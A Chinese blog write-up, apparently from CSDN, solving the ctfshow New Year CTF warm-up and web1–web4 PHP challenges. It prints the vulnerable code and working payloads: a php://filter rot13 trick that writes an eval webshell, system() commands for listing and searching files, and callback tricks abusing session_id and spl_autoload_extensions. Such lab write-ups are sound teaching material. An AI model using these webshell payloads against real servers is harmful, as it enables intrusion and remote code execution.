ctfshow 新年欢乐赛WP

已于 2022-02-22 20:07:21 修改
阅读量620 收藏 1
点赞数 3
分类专栏: web笔记 安全笔记 文章标签: ctf
于 2022-02-21 23:14:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52444045/article/details/123057613
版权

文章目录

热身

<?php

eval($_GET['f']);

方法一

在这里插入图片描述
打开之后先查看phpinfo()
直接可以代码执行,从phpinfo里面找到flag的位置(自动包含的文件)
在这里插入图片描述
输出即可得flag

在这里插入图片描述

方法二

第二种思路是,查看当前页面得变量,直接出flag
?f=print_r(get_defined_vars());

在这里插入图片描述

web1

<?php

highlight_file(__FILE__);
error_reporting(0);

$content = $_GET[content];
file_put_contents($content,'<?php exit();'.$content);

知识点:死亡exit的绕过(分为三种情况)
参考文章:https://www.leavesongs.com/PENETRATION/php-filter-magic.html

网上通用payload:?content=php://filter/write=string.rot13|<?cuc @riny($_CBFG[pzq]);?>|/resource=shell.php========><?php @eval($_POST[cmd]);?>
在这里插入图片描述
写入可利用参数cmd

查找fl开头的文件,post传参 cmd=system("find / -name fl*");

在这里插入图片描述
发现有个/flag.txt
在这里插入图片描述
在这里插入图片描述
查看/flag.txt 即为flag

web2

<?php

highlight_file(__FILE__);
session_start();
error_reporting(0);

include "flag.php";

if(count($_POST)===1){ //post传入的参数量必须只有一个
        extract($_POST);
        if (call_user_func($$$$$${key($_POST)})==="HappyNewYear"){ //invoke
                echo $flag;
        }
}
?>

session_id() 返回当前会话ID。 如果当前没有会话,则返回空字符串("")。

在这里插入图片描述
Post
session_id=session_id
Cookie
PHPSESSID=HappyNewYear

即可得flag

web3

<?php

highlight_file(__FILE__);
error_reporting(0);

include "flag.php";
$key=  call_user_func(($_GET[1]));

if($key=="HappyNewYear"){
  echo $flag;
}

die("虎年大吉,新春快乐!");

知识点:弱比较和回调函数
PHP弱类型比较:https://blog.csdn.net/THlo1/article/details/108227721
在这里插入图片描述

payload:
?1=session_start
?1=error_reporting
?1=json_last_error

session_start:开启会话
error_reporting:如果没有设置可选参数 level, error_reporting() 仅会返回当前的错误报告级别
json_last_error:如果有,返回 JSON 编码解码时最后发生的错误

web4

<?php
highlight_file(__FILE__);
error_reporting(0);

$key=  call_user_func(($_GET[1]));
file_put_contents($key, "<?php eval(\$_POST[1]);?>");

die("虎年大吉,新春快乐!");

spl_autoload_extensions — 注册并返回spl_autoload函数使用的默认文件扩展名。

当不使用任何参数调用此函数时,它返回当前的文件扩展名的列表,不同的扩展名用逗号分隔。要修改文件扩展名列表,用一个逗号分隔的新的扩展名列表字符串来调用本函数即可。中文注:默认的spl_autoload函数使用的扩展名是".inc,.php"。

传入 ?1=spl_autoload_extensions生成 .inc,.php 文件(shell文件)

在这里插入图片描述

之后进入.inc,.php

1=system(‘ls /’)
查看目录下所有文件,发现有个f1ag.txt

在这里插入图片描述
在这里插入图片描述
查看f1ag.txt即可得flag

sec0nd_
关注
专栏目录
【Web】CTFSHOW元旦水友部分wp_ctfshow元旦水友wp
2401_84281629的博客
04-27 871
这里主要是 ,file://协议支持以file://localhost/etc/hosts的方式访问服务器文件,来绕过开头必须是字母的限制。
2024年网安最全CTFShow-MISC入门篇详细wp(1-56)_ctfshow misc入门
2401_84264583的博客
05-01 1165
magicexif元数据编辑器是一款非常专业的照片magicexif元数据编辑器,该软件可以通过分析照片的元数据以及编码特征来计算图像可信度,从而判断照片是否被修改,同时还能对相机的快门次数、镜头参数、光圈档位等进行查看和编辑。
CTFshow---新春欢乐
unexpectedthing的博客
02-11 1243
新春欢乐热身web1web2web3web4web5web6web7 热身 直接执行phpinfo(),有回显 开始准备找flag,但是没找到 看到了auto_prepend_file,有文件目录 直接读取 f=system(“nl /etc/ssh/secret/youneverknow/secret.php”); web1 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last
ctfshow _新春欢乐
as you know, nlp is fantasitc!
02-08 3932
ctfshow _新春欢乐 写在前面:这样每天一道题目,深入学习一个知识点,对于语言的理解会更加清晰,也通过这几天的做题学到很多东西,这里总结下做题过程,下次遇到相同问题能够避免 热身 这个题开始做的很艰难,有两个地方不熟悉,一个eval的代码执行是一条语句,后面要加;另一个是找flag,做题做得少,不知道怎么找 直接可以代码执行,从phpinfo里面找到flag的位置(自动包含的文件) 输出即可 web1 死亡exit的绕过 知识点:死亡exit的绕过(分为三种情况) 开始做这题,不知道这个点,没
ctfshow 新春欢乐
0of_blog
02-02 727
web2 payload cookie PHPSESSID=HappyNewYear post session_id=session_id ct
ctfshow_年ctf-wp
网安小菜鸡
01-30 835
ctfshow年ctf2023-wp
ctfshow-WEB-萌新-wp
F1rstb100d
09-03 655
ctfshow-WEB-萌新-wp
CTFShow 2022——新手杯wp WEB题目
qq_60878323的博客
10-09 1245
小艾大佬的投稿支持 web AK了
[CTFshow]吃瓜杯复现wp
Huamang的博客
08-19 1001
热身 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num,
ctfshow 年ctf
qq_61768489的博客
02-10 861
来设置私有属性,给一个未定义的属性赋值时,触发__set(),传递的参数是被设置的属性名和值.所以,2023是兔年,密码也是。聪明的小伙伴们,你能破解出下面的密码吗?老g师傅最近发现了一个有趣的ctf工具,你能找出flag吗?据说上面的无线电信号代表的是中文,由红岸基地发往半人马星系。弱比较和强比较的问题 2023那里是强比较,还是很容易的。里面的$this->key,为happy2year类。还有个(),所以是个无参函数, 有个trick是。虽然exp比较简单,但是里面的逻辑挺值得学习的。
ctfshow_新春欢乐2022
A的博客
02-03 980
不泄露wp每晚9点更新 热身 ?f=phpinfo(); web1 web2
ctfshow 新春欢乐 web
最新发布
2301_81040377的博客
06-26 427
在进行弱比较的时候字符串若不为空,其布尔值都为true,那么我们只要是key执行结果为true即可。file_put_contents()函数可以写文件如果文件存在则进行覆盖文件内容。代码看起来很简单,我想的是弹shell然后随便就拿到flag了结果找半天找不到。试验也是,但是访问🐯下载文件并没有获得flag。但是我发现个问题就是不能写马,弄了也没利用好。长知识了我以为这个东西只能用来文件包含。估计就是被设置的那种了那么我们访问。那么我们就可以利用这个函数来进行。那么这里使用的一个溢出来进行发送。
CTFshow新春欢乐--web6--反序列化字符串逃逸
unexpectedthing的博客
02-09 1877
web6 考点:反序列化数组+字符串逃逸 这道题还是挺有意思的,首先看代码 <?php error_reporting(0); highlight_file(__FILE__); $function = $_GET['POST']; function filter($img){ $filter_arr = array('ctfshow','daniu','happyhuyear'); $filter = '/'.implode('|',$filter_arr).'/i';
CTFshow_年CTF 2023
weixin_45908624的博客
01-28 825
_年CTF
BUUCTF Reverse 新年快乐 wp
⚪褶
12-03 363
简单的UPX脱壳
CTFSHOW 年CTF(web部分)
羽的博客
01-29 1789
CTFSHOW 年CTF
CTFshow:年CTF 除夕、初一、初二、初五
qq_26961571的博客
06-05 525
然而,php内核的开发者原本是想让程序员借由这种不需要声明的体系,更加高效的开发,所以在几乎所有内置函数以及基本结构中使用了很多松散的比较和转换,防止程序中的变量因为程序员的不规范而频繁的报错,然而这却带来了安全问题。仓颉码的设计,主要的目标,就是为了建立中文的索引观念。仓颉码的索引,是以 ASCII的字符码为基准,但为了程式的处理,在内部转换为 十六进位值,我们称之为「序码」。当源代码进行一些未限制类型的比较,或数学运算的时候,可能会导致zval.type的改变,同时影响zval.value的内容改变。
ctfshow 新春迎新 web2、web3
akxnxbshai的博客
02-09 519
Web2 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last Modified by: h1xa # @Last Modified time: 2022-01-24 22:14:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ highlight_file(__FILE__); session_star
ctfshow元旦水友wp
04-13
很抱歉,我无法提供关于ctfshow元旦水友wp的具体介绍,因为我无法获取实时的比信息。但是,我可以告诉你一些关于CTF的基本知识和常见的解题思路。 CTF(Capture The Flag)比是一种网络安全竞,旨在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sec0nd_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值